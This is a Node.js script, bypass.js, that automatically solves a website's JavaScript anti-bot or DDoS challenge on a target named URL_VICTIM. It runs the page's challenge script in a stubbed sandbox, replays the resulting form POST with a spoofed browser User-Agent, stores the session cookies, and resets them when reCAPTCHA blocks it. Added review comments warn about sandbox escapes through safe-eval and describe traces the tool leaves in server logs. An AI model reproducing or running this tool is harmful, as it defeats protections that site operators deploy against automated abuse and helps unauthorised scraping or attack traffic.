This is not a hack.
This is just the solution to the challenge.
Cookies are saved to the file "aa.json".
Required modules: request, cheerio, safe-eval, tough-cookie-filestore.
Variable URL_VICTIM: set it yourself.
File: bypass.js:
/*
 * bypass.js
 *
 * Node.js client that requests URL_VICTIM + '/' and, when the answer is
 * HTTP 503, parses the returned HTML, evaluates the page's last <script>
 * against a stub DOM, and replays the form POST that the script produced.
 * Cookies are persisted to aa.json through tough-cookie-filestore.
 *
 * NOTE(review): the script text passed to safe-eval comes from the remote
 * response. safe-eval is built on Node's vm module, which is not a security
 * boundary, and sandbox escapes have been reported against it; a hostile or
 * compromised server could therefore reach the host process. Run this only
 * in a disposable, unprivileged environment that holds no credentials.
 *
 * Client behaviour visible in this file (relevant when reading server logs):
 * one fixed User-Agent string, a Referer that is always the site root, GETs
 * for only the first two collected URLs, and a POST body whose values are
 * concatenated without percent-encoding.
 */
var request_module = require('request');
var cheerio = require('cheerio');
// NOTE(review): `qs` is not referenced anywhere in the visible code.
var qs = require('querystring');
var safeEval = require('safe-eval');
var FileCookieStore = require('tough-cookie-filestore');
// Fixed User-Agent sent on every request and exposed to the evaluated script
// as navigator.userAgent.
const browserMe = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36';
// Base URL of the target site; the placeholder must be replaced by the user.
var URL_VICTIM= '###by_yourself###';
// Cookie jar file, stored next to this script. Every cookie the server sets is
// written here, so the file should be treated like a credential store.
const file_name_1= __dirname+ '/aa.json';
// Create the jar file as an empty file if it does not exist yet.
if(!require('fs').existsSync(file_name_1)) require('fs').writeFileSync(file_name_1, '');
// `request` instance whose cookie jar is backed by the file above.
var request = request_module.defaults({ jar : request_module.jar(new FileCookieStore(file_name_1)) });
// Exported state object: the jar-backed request function, a retry counter
// (`try`), and the User-Agent. `calcTime` is not read in the visible code.
var rq= { request, try: 0, calcTime: -1, browserMe }
// Module-level list of requests recorded by fetchMe(). It is never cleared in
// the visible code, so entries accumulate across processHTML() calls.
var arrFetchMe= [];
/**
 * Record a request the evaluated page script wanted to make.
 * Nothing is sent here; the entry is only logged and appended to arrFetchMe.
 *
 * @param {string} url - URL to record.
 * @param {string} [method] - HTTP method ('POST' for form submissions).
 * @param {Object} [data] - Form fields (name -> value) for POST entries.
 */
function fetchMe(url, method, data){
    console.log('url:', url);
    arrFetchMe.push({ url, method: method, data });
}
/**
 * Parse a 503 response body, evaluate its last <script> against a stub DOM
 * and derive the follow-up POST request options.
 *
 * @param {string} html - Body of the 503 response.
 * @param {function(?Object, Object=)} callback - Called with (err) when the
 *   evaluation throws or no POST entry was recorded, otherwise with
 *   (null, opt2) where opt2 is an options object for `request`.
 */
function processHTML(html, callback){
    var $ = cheerio.load(html);
    // Takes the text between the first pair of single quotes in the style
    // attribute of #trk_jschal_nojs and prefixes it with URL_VICTIM.
    // NOTE(review): this line sits outside the try/catch below, so a page
    // without that element or attribute makes it throw.
    var bgImg= URL_VICTIM+ $('#trk_jschal_nojs').attr('style').split('\'')[1];
    // console.log({bgImg});
    fetchMe(bgImg);
    // Source text handed to safe-eval: a no-op IIFE followed by the HTML of
    // the last <script> element in the page.
    var temp = '(function(){})();'+ $('script').last().html();
    // Cache of stub elements handed out by getElementById, keyed by id, so
    // that values the script writes to them are seen again by submit().
    var objDivId= {
    }
    // Stub of the browser `document` object exposed to the evaluated script.
    var document = {
        // Returns one fake element whose appendChild records obj.src.
        getElementsByTagName: function(tag1){
            return [
                {
                    appendChild: function(obj){
                        fetchMe(obj.src);
                    }
                }
            ]
        },
        // Returns (and caches) a stub element built from the cheerio node.
        getElementById: function(id){
            if(objDivId[id]) return objDivId[id];
            var jquery= $('#'+ id);
            var a= {
                value: jquery.attr('value'),
                // Form action made absolute; undefined when there is none.
                action: jquery.attr('action') ?
                    URL_VICTIM+ jquery.attr('action'): undefined,
                // Collects the <input> fields under this element and records
                // a POST entry instead of submitting anything.
                submit: function(){
                    // console.log(objDivId);
                    // console.log('url', this.action);
                    var a= {};
                    $('#'+ id+ ' input').each(function(){
                        var b= $(this).attr('id');
                        // A value set on the cached stub wins over the
                        // value attribute present in the HTML.
                        a[$(this).attr('name')]= (objDivId[b] || {}).value || $(this).attr('value');
                    })
                    fetchMe(this.action, 'POST', a);
                },
                style: {},
                jquery,
                innerHTML: jquery.html()
            };
            objDivId[id]= a;
            return objDivId[id];
        },
        body: {
            // Records the `src` stored by createElement().setAttribute.
            appendChild: function(objEl){
                // console.log(objEl);
                // request to objEl.obj.src
                if(objEl && objEl.obj && objEl.obj.src) fetchMe(objEl.obj.src);
            }
        },
        // Event registration stubs: the handler is invoked immediately.
        attachEvent: function(flag, fn){
            fn();
        },
        // Returns a fake element; setAttribute stores attributes in `obj`
        // and prefixes URL_VICTIM to the value when the attribute is 'src'.
        createElement: function(){
            return {
                innerHTML: '',
                firstChild: { href: URL_VICTIM+ '/' },
                obj: {},
                setAttribute: function(tag, val){
                    this.obj[tag]= tag=='src' ? ( URL_VICTIM+ val ) : val;
                }
            }
        },
        addEventListener: function(flag, fn, trueFalse) {
            fn();
        }
    };
    var navigator = {
        cookieEnabled: true,
        userAgent: browserMe
    }
    // Globals made available to the evaluated script.
    var context = {
        document: document,
        location: {hash: ''},
        window : {
            'addEventListener' : 1,
            navigator
        },
        navigator,
        // Timer stub: runs the callback synchronously and ignores `ms`.
        setTimeout: function(fn, ms){
            // setTimeout(fn, ms);
            fn();
        },
        // Interval stub: schedules nothing, returns an integer from 1 to 10.
        setInterval: function(){
            return 1+ Math.floor(Math.random()*10);
        }
    };
    // NOTE(review): `temp` is server-controlled text; see the safe-eval
    // caveat in the file header before running this outside an isolated
    // environment.
    try{
        safeEval(temp, context);
    }
    catch(_ex){
        return callback(_ex);
    }
    // console.log(arrFetchMe);
    // Fetch the first two recorded URLs; errors and responses are ignored.
    request({
        url: arrFetchMe[0].url,
        headers: {
            'Referer': URL_VICTIM+ '/',
            'User-Agent': browserMe
        }
    }, function(_er0, _res0){
        // response intentionally ignored
    });
    // NOTE(review): arrFetchMe[1] is assumed to exist; this throws otherwise.
    request({
        url: arrFetchMe[1].url,
        headers: {
            'Referer': URL_VICTIM+ '/',
            'User-Agent': browserMe
        }
    }, function(_er0, _res0){
        // response intentionally ignored
    });
    // The most recent entry is expected to be the POST recorded by submit().
    var meLen= arrFetchMe.length -1;
    if(arrFetchMe[meLen] && arrFetchMe[meLen].data){
        var x= arrFetchMe[meLen], dataString= '', start0= 0;
        // Join the fields as name=value pairs separated by '&'. Names and
        // values are concatenated as-is, with no percent-encoding.
        Object.keys(x.data).forEach(function(el){
            var a= x.data[el];
            if(!start0){
                start0= 1;
            }
            else dataString+= '&';
            dataString+= ''+ el+ '='+ x.data[el];
        });
        console.log({dataString});
        var opt2 = {
            url: x.url,
            headers: {
                'Referer': URL_VICTIM+ '/',
                'User-Agent': browserMe,
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            method: 'POST',
            body: dataString
        };
        callback(null, opt2);
    }
    else {
        callback({message: 'html ddos cloudflare change?'});
    }
};
/**
 * Process a 503 page, wait `timeOut` ms, send the derived POST and react to
 * the status code of the answer.
 *
 * @param {string} html - Body of the 503 response.
 * @param {number} timeOut - Delay in milliseconds before the POST is sent.
 * @param {function(number)=} callbackDone - Called with 0 on HTTP 200.
 */
function poolWeb(html, timeOut, callbackDone){
    processHTML(html, function(err, opt2){
        // Restart from mainAction with the delay increased by one second
        // (never below 20 ms).
        function callNext(){
            var timeOut_calc= Math.max(20, timeOut+ 1000);
            mainAction(timeOut_calc, callbackDone);
        }
        if(err){
            console.log(err.message);
            callNext();
            return;
        }
        setTimeout(function(){
            var fileName = file_name_1;
            function callbackRequest(err2, res2, html2) {
                if(err2) return callNext();
                var x = res2.statusCode;
                if(x==403){
                    // require('fs').writeFileSync('./g-capcha.html', html2);
                    console.log('g-recapcha');
                    // On every fifth counted attempt the cookie file is
                    // truncated before retrying.
                    if(rq.try%5 == 4) require('fs').writeFileSync(fileName, '');
                    rq.try++;
                    callNext();
                }
                else if(x==503){
                    console.log('why enable javascript...');
                    // Same truncation check as for 403; rq.try is not
                    // incremented on this path.
                    if(rq.try%5 == 4) require('fs').writeFileSync(fileName, '');
                    callNext();
                }
                else if(x==200){
                    console.log('oke 1');
                    rq.try= 0;
                    rq.ok= true;
                    if(callbackDone) callbackDone(0);
                }
                else callNext();
            }
            request(opt2, callbackRequest);
        }, timeOut);
    })
}
/**
 * Entry point: GET the site root and hand a 503 answer to poolWeb().
 *
 * On HTTP 200 it sets rq.ok and calls callbackDone(0). On a transport error
 * it only logs the error; callbackDone is not invoked. Status codes other
 * than 200 and 503 are logged and nothing further happens.
 *
 * @param {number} timeOut - Delay in milliseconds passed on to poolWeb().
 * @param {function(number)=} callbackDone - Called with 0 once a 200 is seen.
 */
function mainAction(timeOut, callbackDone){
    var options = {
        url: URL_VICTIM+ '/',
        timeout: 5000,
        headers: {
            'User-Agent': browserMe
        }
    };
    request(options , function (error, response, html) {
        if (!error && response.statusCode == 200) {
            console.log('oke 0');
            //require('fs').writeFileSync('./app2.html', html);
            rq.ok= true;
            rq.try= 0;
            if(callbackDone) callbackDone(0);
        }
        else if(error) console.error(error);
        else{
            var x = response.statusCode;
            console.log({
                "note": 'fail 1st',
                "resCode": response.statusCode
            })
            if(x==503) poolWeb(html, timeOut, callbackDone);
        }
    });
}
// mainAction(9000);
// Expose the entry point alongside the request instance and counters.
rq.mainAction= mainAction;
module.exports= rq;
//USE:
// const rq= require('./bypass.js');
// Take the cookie-jar-backed `request` instance from the module. When rq.ok
// is not set yet, the assignment happens inside the mainAction callback, so
// `request` stays undefined until that callback has run.
var request;
if (rq.ok) {
    request = rq.request;
} else {
    rq.mainAction(9000, function () {
        request = rq.request;
    });
}